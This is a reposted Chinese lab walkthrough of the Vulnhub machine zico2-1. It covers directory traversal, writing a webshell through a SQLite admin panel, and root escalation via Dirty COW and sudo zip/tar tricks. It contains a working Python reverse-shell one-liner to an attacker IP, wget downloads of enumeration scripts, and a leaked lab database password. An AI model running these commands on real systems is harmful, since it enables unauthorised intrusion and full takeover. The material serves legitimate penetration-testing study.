【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月1日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、web突破

信息收集

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

发现开启了22可以登录ssh,80一个web,111忽略不计先

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

这应该是用户名

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

没啥发现,开扫

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

目录遍历,利用

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

目录遍历存在,可行,按照AWVS给出的方法去利用即可

在这个同时,也用dirb扫一下目录

locate big.txt
然后复制上
dirb http:
忘记复制了,clear了

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

可以看到还是有点东西的,vendor啊,这都是以前有过敏感信息泄露的目录,但是最显眼的还要属这个dbadmin了吧
进去了以后就一个子目录,点一下,就是下面的页面
弱口令直接进,也没法爆破估计,连正儿八经的web页面都空荡荡的,也没密码本,ctf再怎么样也会有解题方法的

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

看到了这个版本,就去搜一下

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

果然,那就看看

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

最左边先新建一个数据库,然后点击新的数据库,再点右边的红框,随便输,然后go

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

然后在红框写个一句话

里面全是一句话

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

然后就可以看到已经写进去了,接下来就是找目录,才能去执行,我发现左边的红框那个很有可能就是路径,那就实验一下,直接读肯定是不行的(最基本的安全性要有吧。。。)那就顺其自然的想到了之前的目录遍历漏洞,用那个读取然后传参,参数带着命令

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

成功

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
nc -vlp 6666

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.253.166",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import pty; pty.spawn("/bin/bash")'

三、提权

信息枚举

python -m http.server 8082
wget http://192.168.247.129:8082/linpeas.sh
wget http://192.168.247.129:8082/les.sh

chmod +x linpeas.sh
另一个也赋权
./linpeas.sh
执行就行

linpeas.sh枚举结果

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
/home/zico/wordpress/wp-config.php
define('DB_NAME', 'zico');
define('DB_USER', 'zico');
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
define('DB_HOST', 'zico');

les.sh信息枚举结果

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

谷歌搜一下,官方数据库中这是利用方法,

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

拿到了root

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

; 别的提权思路

在我打完的时候习惯性看别的师傅的WP,因为这个很简单,我打的也很快,所以我觉得应该还有别的思路
他们利用二进制提权,但是我的sudo -l报这个错,用不了,就搬运一下别的师傅

【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

sudo 提权 zip

ssh zico@192.168.253.174
sWfCsfJSPV9H3AmQzw8

sudo -l
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip

二进制:
https://gtfobins.github.io/gtfobins/zip/
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT ‘sh #’

或者使用命令:
使用zip命令中可用的–unzip-command选项在压缩文件时运行bash shell:
sudo zip /tmp/1.zip /home/zico/dayu -T –unzip-command=”sh -c /bin/bash”

sudo提权tar

https://gtfobins.github.io/gtfobins/tar/

sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/bash

tar另外一种用法:

find提权 (其实这里也是使用了tar进行执行提权,然后转到find,重点是find执行命令提权)
查看是否存在find命令setuid执行权限:
find / -perm -4000 2>/dev/null | grep find

通过tar命令创建find命令具备setuid执行权限:
cd /tmp
echo “chmod u+s /usr/bin/find” > shell.sh
echo “” > “–checkpoint-action=exec=sh shell.sh”
echo “” > –checkpoint=1 —–创建两个文件,方便通过tar命令将此文件当做命令去执行!
sudo tar cf archive.tar *

创建完成确认find命令是否成功被赋予setuid权限:
find / -perm -4000 2>/dev/null | grep find
执行find命令开始提权
find /tmp -exec sh -i ;

Original: https://blog.csdn.net/weixin_65527369/article/details/127129180
Author: 人间体佐菲
Title: 【甄选靶场】Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/816855/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球